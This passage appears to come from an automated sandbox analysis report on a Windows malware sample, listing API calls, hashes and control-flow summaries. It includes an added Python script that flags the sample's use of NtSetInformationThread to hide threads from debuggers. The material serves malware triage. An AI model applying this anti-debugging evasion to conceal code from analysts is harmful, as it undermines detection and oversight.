                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: CurrentThread
                                • String ID:
                                • API String ID: 2882836952-0
                                • Opcode ID: dcccb8b7abd92f1a7871da50f36b234f985e9760764ed8db05e324df47516cea
                                • Instruction ID: e48f6bce70cc55ac9356c7f352818af49b7f18f144d85f7369618eb7061b651f
                                • Opcode Fuzzy Hash: dcccb8b7abd92f1a7871da50f36b234f985e9760764ed8db05e324df47516cea
                                • Instruction Fuzzy Hash: 3551D132106B018BC330CF28C580796B7A3BFD6364F698E1DC0E65BE95DB74B9468B91
                                APIs
                                • GetCurrentThread.KERNEL32 ref: 6C883E9D
                                • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C883EAA
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: Thread$CurrentInformation
                                • String ID:
                                • API String ID: 1650627709-0
                                • Opcode ID: a8adb62f9e32f4db56a6c0177056c50a1ea42342c81b4a314ad15f791786d446
                                • Instruction ID: 9fa81659726ccdca56c3e5b9bb7a20c76133742d950b68040dd641937acdf139
                                • Opcode Fuzzy Hash: a8adb62f9e32f4db56a6c0177056c50a1ea42342c81b4a314ad15f791786d446
                                • Instruction Fuzzy Hash: C2310232206B018BC330CF24C9947C6B7A3AFA6314F2A8E1DC0A65BE80DB7478098B51
                                APIs
                                • GetCurrentThread.KERNEL32 ref: 6C883E9D
                                • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C883EAA
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: Thread$CurrentInformation
                                • String ID:
                                • API String ID: 1650627709-0
                                • Opcode ID: f474c27126ca599ee4ac8f35c58c8de930a512e8d44e4b5e906189323f07ea64
                                • Instruction ID: 37a1e205a057a7d89dc359048cb39b377a326fe4080764b43acac7fa6513feed
                                • Opcode Fuzzy Hash: f474c27126ca599ee4ac8f35c58c8de930a512e8d44e4b5e906189323f07ea64
                                • Instruction Fuzzy Hash: 8231EF32106B05CBC734CF28C590796B7A6AFA6304F694E1DC0EA5BE85DB71B845CB91
                                APIs
                                • GetCurrentThread.KERNEL32 ref: 6C883E9D
                                • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C883EAA
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: Thread$CurrentInformation
                                • String ID:
                                • API String ID: 1650627709-0
                                • Opcode ID: e0cc55642f0aa5316b77d5914bd14c22f2cc482ec1a5e30e61cad47fc3c6a462
                                • Instruction ID: db741bf809bf3508647732003c562ae94f59275e1502aaa037cbbfead25d64b9
                                • Opcode Fuzzy Hash: e0cc55642f0aa5316b77d5914bd14c22f2cc482ec1a5e30e61cad47fc3c6a462
                                • Instruction Fuzzy Hash: 5521363121AB05CFC334CF24C9A0796B7B7AF92305F258E1DC0A65BE80DB74B8048B91
                                APIs
                                • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6CA05130
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ManagerOpen
                                • String ID:
                                • API String ID: 1889721586-0
                                • Opcode ID: da37ae074b38d9be5e7c12f3063f4345589ce26a2ef03a7ea1874a96728ddc60
                                • Instruction ID: de3f4cbf51e74d0dac888fefe2d7829a372a3375158e37da91f5e1eb632dca24
                                • Opcode Fuzzy Hash: da37ae074b38d9be5e7c12f3063f4345589ce26a2ef03a7ea1874a96728ddc60
                                • Instruction Fuzzy Hash: FA3149B4708301EFC7109F28D544A1ABBF0EB9A798F54895EF888C7361D331C8889B56
                                APIs
                                • FindFirstFileA.KERNEL32(?,?), ref: 6C9FAEDC
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: FileFindFirst
                                • String ID:
                                • API String ID: 1974802433-0
                                • Opcode ID: ce46de013bd6272e22be422f66af2748e1530aea8d0ecd2e50e8d97c2adaed40
                                • Instruction ID: 72a7abd8c7301e9223993e56fe593892b41eb4e6c88645d461aec9c1eb6e398d
                                • Opcode Fuzzy Hash: ce46de013bd6272e22be422f66af2748e1530aea8d0ecd2e50e8d97c2adaed40
                                • Instruction Fuzzy Hash: 7E1148B4508351AFE7108F28D54451EBBE8BF96314F548E59F4B8CB791DB30CC968B22
                                APIs
                                • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C9DABA7
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: FileRead
                                • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                                • API String ID: 2738559852-1563143607
                                • Opcode ID: fd76b181aa2b1c0f5d649491fc6c2c7e73356f7e911f5a03c8d631b25df52d1a
                                • Instruction ID: 3518d04f57d9c1f1ec242cf85e7fa9a78977a02cdad581a67213eaf52326bd2e
                                • Opcode Fuzzy Hash: fd76b181aa2b1c0f5d649491fc6c2c7e73356f7e911f5a03c8d631b25df52d1a
                                • Instruction Fuzzy Hash: B262687060DB818FC724CF18D490A5ABBF2ABD9314F258D1EE999DB750DB34E8468B43

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                 [control-flow graph not reproduced: function entered at 6ca1cad3, basic blocks 6ca1cad3-6ca1ce82; calls GetConsoleMode, ReadConsoleW, ReadFile, GetLastError and internal routines 6ca0f9cc, 6ca0f9df, 6ca0f9f2, 6ca10120, 6ca147bb, 6ca147f5, 6ca1ac69, 6ca219e5, 6ca1ce83, 6ca1cefe, 6ca1d1b6]
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: 8Q
                                • API String ID: 0-4022487301
                                • Opcode ID: 83f1658a3ca54e1dc4cb47057d74e7d3083345115b8ee32a1cc94c75a1b2b659
                                • Instruction ID: 602c3e9d6643b320ef8290d0d1e235469119f885202d879f41e474c54b0204e3
                                • Opcode Fuzzy Hash: 83f1658a3ca54e1dc4cb47057d74e7d3083345115b8ee32a1cc94c75a1b2b659
                                • Instruction Fuzzy Hash: 73C10670B082599FDF05DF98C980BADBFB1AF4A31CF144169E414ABF81C7709989CB64

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                 [control-flow graph not reproduced: function entered at 6ca2406c, basic blocks 6ca2406c-6ca24395; calls GetFileType, GetLastError, CloseHandle and internal routines 6ca244ec, 6ca2160c, 6ca24457, 6ca0f9cc, 6ca0f9df, 6ca0f9f2, 6ca217b0, 6ca24710, 6ca24666, 6ca1b925, 6ca2171f]
                                APIs
                                  • Part of subcall function 6CA24457: CreateFileW.KERNEL32(00000000,00000000,?,6CA24115,?,?,00000000,?,6CA24115,00000000,0000000C), ref: 6CA24474
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA24180
                                • __dosmaperr.LIBCMT ref: 6CA24187
                                • GetFileType.KERNEL32(00000000), ref: 6CA24193
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA2419D
                                • __dosmaperr.LIBCMT ref: 6CA241A6
                                • CloseHandle.KERNEL32(00000000), ref: 6CA241C6
                                • CloseHandle.KERNEL32(6CA1B0D0), ref: 6CA24313
                                • GetLastError.KERNEL32 ref: 6CA24345
                                • __dosmaperr.LIBCMT ref: 6CA2434C
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                • String ID: 8Q
                                • API String ID: 4237864984-4022487301
                                • Opcode ID: 2145fe1653c8e00ba17596cfc5722001625565f6ee65336e8249b18c4b0adc80
                                • Instruction ID: 1ab992d42adf9783b0749792c2afc9a5755d8e19f54583e7885ab9b43dadfde4
                                • Opcode Fuzzy Hash: 2145fe1653c8e00ba17596cfc5722001625565f6ee65336e8249b18c4b0adc80
                                • Instruction Fuzzy Hash: EEA14B32A045689FCF098F68DC517AE7BB1AB47328F1C425DE811EF790C739889ACB55
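                                 The API reference lines in these entries are the part worth machine-reading during triage: NtSetInformationThread with ThreadInformationClass 00000011 at 6C883EAA (immediately after GetCurrentThread at 6C883E9D, so at run time the handle is that thread's pseudo-handle, whatever the statically resolved 00000000 shown here suggests), OpenSCManagerA with desired access 00000001 at 6CA05130, ReadFile with a 00001000-byte buffer at 6C9DABA7, and the CreateFileW subcall reached through 6CA24457. The Python below is an added example, not code from the Joe Sandbox report or its IDA plugin. It parses lines in exactly this format and decodes the arguments that matter: class 0x11 is ThreadHideFromDebugger, which makes the calling thread invisible to an attached debugger (the behaviour behind the "hides threads from debuggers" finding), and access 0x1 to the service control manager is SC_MANAGER_CONNECT. The sample input is constructed from the lines shown in this section; arguments the static analysis could not resolve appear as "?" and are kept as None rather than guessed.

```python
"""Decode Joe Sandbox 'APIs' reference lines and flag anti-debug call sites.

Added example (not Joe Sandbox code). Input lines look like:
    • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C883EAA
    • GetCurrentThread.KERNEL32 ref: 6C883E9D
      • Part of subcall function 6CA24457: CreateFileW.KERNEL32(...), ref: 6CA24474
"""
import re
from dataclasses import dataclass, field

LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# THREADINFOCLASS values that matter for anti-analysis (ntddk.h numbering).
THREAD_INFO_CLASS = {
    0x11: "ThreadHideFromDebugger",
    0x12: "ThreadBreakOnTermination",
}

# SC_MANAGER_* access rights from winsvc.h.
SC_MANAGER_RIGHTS = {
    0x0001: "SC_MANAGER_CONNECT",
    0x0002: "SC_MANAGER_CREATE_SERVICE",
    0x0004: "SC_MANAGER_ENUMERATE_SERVICE",
    0x0008: "SC_MANAGER_LOCK",
    0x0010: "SC_MANAGER_QUERY_LOCK_STATUS",
    0x0020: "SC_MANAGER_MODIFY_BOOT_CONFIG",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list          # int per argument, None where the report shows '?'
    ref: int            # call-site address
    notes: list = field(default_factory=list)


def _parse_arg(tok):
    tok = tok.strip()
    return None if tok in ("", "?") else int(tok, 16)


def _annotate(call):
    """Attach a human-readable decoding of the security-relevant argument."""
    a = call.args
    if call.api == "NtSetInformationThread" and len(a) >= 2 and a[1] is not None:
        name = THREAD_INFO_CLASS.get(a[1], f"ThreadInformationClass 0x{a[1]:x}")
        call.notes.append(name)
        if a[1] == 0x11:
            call.notes.append("anti-debug: hides calling thread from debugger")
    elif call.api.startswith("OpenSCManager") and len(a) >= 3 and a[2] is not None:
        names = [n for bit, n in SC_MANAGER_RIGHTS.items() if a[2] & bit]
        call.notes.append("|".join(names) if names else f"access 0x{a[2]:x}")
    elif call.api == "ReadFile" and len(a) >= 3 and a[2] is not None:
        call.notes.append(f"buffer 0x{a[2]:x} bytes")


def parse_api_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [] if raw is None else [_parse_arg(t) for t in raw.split(",")]
    call = ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16))
    _annotate(call)
    return call


def parse_report(text):
    return [c for c in (parse_api_line(l) for l in text.splitlines()) if c]


def antidebug_refs(calls):
    """Call-site addresses of NtSetInformationThread(.., ThreadHideFromDebugger, ..)."""
    return sorted({c.ref for c in calls
                   if c.api == "NtSetInformationThread"
                   and len(c.args) > 1 and c.args[1] == 0x11})


# Constructed sample: the API lines from this report section, verbatim.
SAMPLE = """\
• GetCurrentThread.KERNEL32 ref: 6C883E9D
• NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C883EAA
• OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6CA05130
• FindFirstFileA.KERNEL32(?,?), ref: 6C9FAEDC
• ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C9DABA7
  • Part of subcall function 6CA24457: CreateFileW.KERNEL32(00000000,00000000,?,6CA24115,?,?,00000000,?,6CA24115,00000000,0000000C), ref: 6CA24474
"""

if __name__ == "__main__":
    calls = parse_report(SAMPLE)
    for c in calls:
        print(f"{c.ref:08X} {c.api}.{c.module} {c.notes}")
    print("anti-debug call sites:", [hex(r) for r in antidebug_refs(calls)])
```

                                 Feed it the "APIs" lines of any function entry (including the indented "Part of subcall function" form) and compare the returned refs against the addresses you set breakpoints on; a ThreadHideFromDebugger call that executes before your breakpoint is why the thread then appears to run unobserved.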

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                 [control-flow graph not reproduced: function entered at 6c9dc1e0, basic blocks 6c9dc1e0-6c9dc4d7; calls WriteFile, ReadFile and internal routines 6ca06b70, 6ca0b3a0, 6ca0b920]
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: :uW$;uW$;uW$> 4!$> 4!
                                • API String ID: 0-4100612575
                                • Opcode ID: 16a426276503846efdfaf458e91ee4c04494b42be0960f20880a0ddefb25c5c6
                                • Instruction ID: c59222ae607cceaf44dc0195660e4b6aaa3879ea352ddd6bea298a7231377301
                                • Opcode Fuzzy Hash: 16a426276503846efdfaf458e91ee4c04494b42be0960f20880a0ddefb25c5c6
                                • Instruction Fuzzy Hash: AE719FB0208785AFD710DF54C480B5ABBF4FF8A708F11892EF599E7650D771E8889B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: K?Jo$K?Jo$`Rlx$7eO
                                • API String ID: 0-174837320
                                • Opcode ID: 1e0d18f65f419d2cc0d3cca6d6244551af1182f730d3a10618be0608c5f35a76
                                • Instruction ID: b9b5975373d64a2e4bbd618be5a2ef132aa1712caf250b1012e4393c23c20c02
                                • Opcode Fuzzy Hash: 1e0d18f65f419d2cc0d3cca6d6244551af1182f730d3a10618be0608c5f35a76
                                • Instruction Fuzzy Hash: 3D4257B86097428FC754CF18C090A2ABBF1AFC9754F258E1EE599A7B20D734E845CB53
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: ;T55
                                • API String ID: 0-2572755013
                                • Opcode ID: 6d446f206a182681b63a205e2afeac7a36ec6a724c282898dd154b2d08f20d21
                                • Instruction ID: 1dddb5b2454ad61c0909fe3b31179102ffb5f32e76758af05a8c88dbd73f9f5a
                                • Opcode Fuzzy Hash: 6d446f206a182681b63a205e2afeac7a36ec6a724c282898dd154b2d08f20d21
                                • Instruction Fuzzy Hash: 0803C232645B018FC738CF2CC9D0696B7E3AFD53287198E6DC0A64BA95DB74B44ACB50

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 7579 6ca04ff0-6ca05077 CreateProcessA 7580 6ca050ca-6ca050d3 7579->7580 7581 6ca050f0-6ca0510b 7580->7581 7582 6ca050d5-6ca050da 7580->7582 7581->7580 7583 6ca05080-6ca050c2 WaitForSingleObject CloseHandle * 2 7582->7583 7584 6ca050dc-6ca050e1 7582->7584 7583->7580 7584->7580 7585 6ca050e3-6ca05118 7584->7585
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID: D
                                • API String ID: 963392458-2746444292
                                • Opcode ID: 47a70539484ea61a4517adfb9bcce3fb8496d2cf7f5a9e89d9e364f183d6797c
                                • Instruction ID: ec94aeb8f6131d414875486d70471e824ff7ee79c4f20d4cd98b132506c990b6
                                • Opcode Fuzzy Hash: 47a70539484ea61a4517adfb9bcce3fb8496d2cf7f5a9e89d9e364f183d6797c
                                • Instruction Fuzzy Hash: C831E170A093808FD740DF28D19872EBBF0AB9A358F405A1DF8D997250E7B595888F47

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 7587 6ca1bc5e-6ca1bc7a 7588 6ca1bc80-6ca1bc82 7587->7588 7589 6ca1be39 7587->7589 7590 6ca1bca4-6ca1bcc5 7588->7590 7591 6ca1bc84-6ca1bc97 call 6ca0f9df call 6ca0f9cc call 6ca10120 7588->7591 7592 6ca1be3b-6ca1be3f 7589->7592 7593 6ca1bcc7-6ca1bcca 7590->7593 7594 6ca1bccc-6ca1bcd2 7590->7594 7607 6ca1bc9c-6ca1bc9f 7591->7607 7593->7594 7596 6ca1bcd4-6ca1bcd9 7593->7596 7594->7591 7594->7596 7598 6ca1bcdb-6ca1bce7 call 6ca1ac69 7596->7598 7599 6ca1bcea-6ca1bcfb call 6ca1be40 7596->7599 7598->7599 7608 6ca1bcfd-6ca1bcff 7599->7608 7609 6ca1bd3c-6ca1bd4e 7599->7609 7607->7592 7612 6ca1bd01-6ca1bd09 7608->7612 7613 6ca1bd26-6ca1bd32 call 6ca1beb1 7608->7613 7610 6ca1bd50-6ca1bd59 7609->7610 7611 6ca1bd95-6ca1bdb7 WriteFile 7609->7611 7617 6ca1bd85-6ca1bd93 call 6ca1c2c3 7610->7617 7618 6ca1bd5b-6ca1bd5e 7610->7618 7614 6ca1bdc2 7611->7614 7615 6ca1bdb9-6ca1bdbf GetLastError 7611->7615 7619 6ca1bdcb-6ca1bdce 7612->7619 7620 6ca1bd0f-6ca1bd1c call 6ca1c25b 7612->7620 7621 6ca1bd37-6ca1bd3a 7613->7621 7622 6ca1bdc5-6ca1bdca 7614->7622 7615->7614 7617->7621 7624 6ca1bd60-6ca1bd63 7618->7624 7625 6ca1bd75-6ca1bd83 call 6ca1c487 7618->7625 7623 6ca1bdd1-6ca1bdd6 7619->7623 7629 6ca1bd1f-6ca1bd21 7620->7629 7621->7629 7622->7619 7630 6ca1be34-6ca1be37 7623->7630 7631 6ca1bdd8-6ca1bddd 7623->7631 7624->7623 7632 6ca1bd65-6ca1bd73 call 6ca1c39e 7624->7632 7625->7621 7629->7622 7630->7592 7635 6ca1be09-6ca1be15 7631->7635 7636 6ca1bddf-6ca1bde4 7631->7636 7632->7621 7639 6ca1be17-6ca1be1a 7635->7639 7640 6ca1be1c-6ca1be2f call 6ca0f9cc call 6ca0f9df 7635->7640 7641 6ca1bde6-6ca1bdf8 call 6ca0f9cc call 6ca0f9df 7636->7641 7642 6ca1bdfd-6ca1be04 call 6ca0f9f2 7636->7642 7639->7589 7639->7640 7640->7607 7641->7607 7642->7607
                                APIs
                                  • Part of subcall function 6CA1BEB1: GetConsoleCP.KERNEL32(?,6CA1B0D0,?), ref: 6CA1BEF9
                                • WriteFile.KERNEL32(?,?,6CA246EC,00000000,00000000,?,00000000,00000000,6CA25AB6,00000000,00000000,?,00000000,6CA1B0D0,6CA246EC,00000000), ref: 6CA1BDAF
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CA246EC,6CA1B0D0,00000000,?,?,?,?,00000000,?), ref: 6CA1BDB9
                                • __dosmaperr.LIBCMT ref: 6CA1BDFE
                                Strings
